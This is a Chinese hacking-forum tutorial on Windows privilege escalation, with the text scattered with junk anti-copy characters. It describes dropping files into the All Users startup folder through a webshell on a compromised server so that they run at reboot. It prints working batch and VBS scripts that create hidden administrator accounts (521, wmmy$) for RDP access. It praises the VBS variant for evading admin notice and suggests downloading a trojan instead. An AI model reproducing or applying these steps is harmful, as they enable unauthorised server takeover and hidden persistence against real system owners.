- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是
3 \5 a! a2 {3 ?4 U7 {启动 提权, s8 U/ i' a3 d7 E% N4 H
C:\Docume~1\All Users\「开始」菜单\程序\启动9 c' S7 _, g: u, h! s, _: f% L
在这里必须有写入权限 否则此方法无效
6 s5 c/ l( L" C& s4 e! T% l8 l# m因为我是在网吧 这里显示不了路径
% m) `2 C2 X0 I8 @& y% u- w我去服务器上演示给大家看
5 r- D& `; B! [7 S2 \% F大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的 P0 M9 Y0 w/ j. N& q( {8 D2 B
文件 从而运行我们的文件
9 H# d2 [3 w# S" Y- _0 u这里有两中方式 第一种是批处理5 l2 A7 q+ m8 e7 x, z
我们来看下目前 我机器上的用户组
; b/ d1 {* l: O/ U# J+ `) K' j目前我们没有521这个用户' ?: w' q- W7 m, \; O6 a; \$ ~( d
看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示5 _( s+ g. w2 |% I1 N5 r
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现4 Z7 n, q6 X! S% H& T
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
3 s8 _4 M2 k/ x. |9 V大家看 已经成功加入了WMMY用户
4 j+ M% _" o. M2 E1 K网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了
+ a: t0 z T3 ? i: P" r$ E* D" m9 t当前终端服务端口: 33895 o K2 x) l/ ? B
系统自动登录功能未开启8 g: M6 o6 M! [6 m3 q
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了! o' n- h2 X5 f
C:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径* @! y' J5 O/ E9 t! i5 Y
第一种隐蔽性太差 我们就用第二种吧0 M4 y, u ]" N5 O/ d
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去, n$ ]+ X8 ^6 e. K5 z3 m
从而取得了3389的登陆权限
+ o# ^0 k7 m+ {其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
^! E2 z; }0 \& T: \基本原理都差不多 我就不多介绍了
! H( e; x7 L: |0 |教程结束```! y5 v2 x" |- _6 f2 p# s
@echo off
0 n' l# t- w- Z" ~3 enet user 521 521 /add$ U& M, P( K/ W! ?9 T; a
net localgroup administrators 521 /add( {) I4 I, t z% v. A
7 ^7 f0 n* L! g4 I( R
on Error Resume next
9 V+ W- t; c7 i7 T jset wshshell=createobject("wscript.shell")
0 \/ M9 D: G8 v( N8 I! Ta=wshshell.run("net user wmmy$ 1227 /add",0)/ J. j/ x% T$ {' g1 R+ D! C+ |
a=wshshell.run("net localgroup administrators wmmy$ /add",0)
) |8 z. _$ ^9 @* T* ~
5 g9 H) t7 H( p# ^. O& @# j$ i
, z1 W) ^* P: F# {# b l7 F点击下载% I/ H& J v* }( |\" h
|
-
2
评分人数
-
|